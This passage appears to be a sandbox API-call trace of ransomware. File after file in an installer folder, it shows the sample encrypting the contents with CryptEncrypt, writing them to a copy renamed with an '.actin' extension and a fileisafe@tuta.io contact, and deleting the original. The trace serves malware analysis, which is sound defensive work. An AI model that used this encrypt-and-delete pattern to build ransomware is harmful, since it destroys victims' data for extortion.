(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.576] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18776) returned 1 [0047.577] CloseHandle (hObject=0x348) returned 1 [0047.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 0x80 [0047.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.577] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.577] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.577] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.577] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.577] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71fc0) returned 1 [0047.577] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.577] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4958, lpOverlapped=0x0) returned 1 [0047.578] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960, dwBufLen=0x4960 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960) returned 1 [0047.579] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4960, lpOverlapped=0x0) returned 1 [0047.580] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71c80) returned 1 [0047.580] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.580] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.580] CryptDestroyKey (hKey=0xf71c80) returned 1 [0047.580] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.580] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0047.580] CloseHandle (hObject=0x348) returned 1 [0047.580] CloseHandle (hObject=0x324) returned 1 [0047.581] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 1 [0047.582] SetEvent (hEvent=0x2e8) returned 1 [0047.582] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.582] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.582] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=6309) returned 1 [0047.582] CloseHandle (hObject=0x324) returned 1 [0047.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 0x80 [0047.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.582] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.582] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.582] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.582] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.584] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c80) returned 1 [0047.584] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.584] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x18a5, lpOverlapped=0x0) returned 1 [0047.585] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x18b0, dwBufLen=0x18b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x18b0) returned 1 [0047.585] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x18b0, lpOverlapped=0x0) returned 1 [0047.588] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0047.588] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.588] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0047.588] CryptDestroyKey (hKey=0xf71b00) returned 1 [0047.588] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0047.588] CryptDestroyKey (hKey=0xf71c80) returned 1 [0047.588] CloseHandle (hObject=0x324) returned 1 [0047.588] CloseHandle (hObject=0x348) returned 1 [0047.589] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 1 [0047.590] SetEvent (hEvent=0x2e8) returned 1 [0047.590] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.590] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.590] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=60816) returned 1 [0047.590] CloseHandle (hObject=0x348) returned 1 [0047.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 0x80 [0047.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.590] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.590] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.590] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.590] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.591] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0047.591] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.591] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xed90, lpOverlapped=0x0) returned 1 [0047.593] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xeda0, dwBufLen=0xeda0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xeda0) returned 1 [0047.593] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xeda0, lpOverlapped=0x0) returned 1 [0047.594] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e80) returned 1 [0047.594] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.594] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.594] CryptDestroyKey (hKey=0xf71e80) returned 1 [0047.595] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.595] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0047.595] CloseHandle (hObject=0x348) returned 1 [0047.595] CloseHandle (hObject=0x324) returned 1 [0047.596] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 1 [0047.597] SetEvent (hEvent=0x2e8) returned 1 [0047.598] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.598] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.598] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=14168) returned 1 [0047.598] CloseHandle (hObject=0x324) returned 1 [0047.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 0x80 [0047.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.598] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.598] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.598] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.598] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.598] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0047.598] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.599] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x3758, lpOverlapped=0x0) returned 1 [0047.600] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3760, dwBufLen=0x3760 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3760) returned 1 [0047.600] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x3760, lpOverlapped=0x0) returned 1 [0047.601] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d40) returned 1 [0047.601] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.601] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.601] CryptDestroyKey (hKey=0xf71d40) returned 1 [0047.601] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.601] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0047.601] CloseHandle (hObject=0x324) returned 1 [0047.602] CloseHandle (hObject=0x348) returned 1 [0047.602] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 1 [0047.603] SetEvent (hEvent=0x2e8) returned 1 [0047.603] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.603] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.604] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3069) returned 1 [0047.604] CloseHandle (hObject=0x348) returned 1 [0047.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 0x80 [0047.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.604] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0047.604] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.604] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.604] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.045] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ec0) returned 1 [0048.045] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.045] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xbfd, lpOverlapped=0x0) returned 1 [0048.048] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc00, dwBufLen=0xc00 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc00) returned 1 [0048.048] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xc00, lpOverlapped=0x0) returned 1 [0048.049] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71cc0) returned 1 [0048.049] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.049] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0048.049] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0048.049] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0048.049] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0048.049] CloseHandle (hObject=0x348) returned 1 [0048.049] CloseHandle (hObject=0x338) returned 1 [0048.050] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 1 [0048.051] SetEvent (hEvent=0x2e8) returned 1 [0048.051] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.051] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.051] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18776) returned 1 [0048.051] CloseHandle (hObject=0x338) returned 1 [0048.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 0x80 [0048.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.051] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.052] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.052] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.052] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.052] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0048.052] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.052] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4958, lpOverlapped=0x0) returned 1 [0048.054] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960, dwBufLen=0x4960 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960) returned 1 [0048.054] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4960, lpOverlapped=0x0) returned 1 [0048.055] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72180) returned 1 [0048.055] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.055] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0048.055] CryptDestroyKey (hKey=0xf72180) returned 1 [0048.055] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0048.055] CryptDestroyKey (hKey=0xf72140) returned 1 [0048.055] CloseHandle (hObject=0x338) returned 1 [0048.055] CloseHandle (hObject=0x348) returned 1 [0048.056] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 1 [0048.057] SetEvent (hEvent=0x2e8) returned 1 [0048.057] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 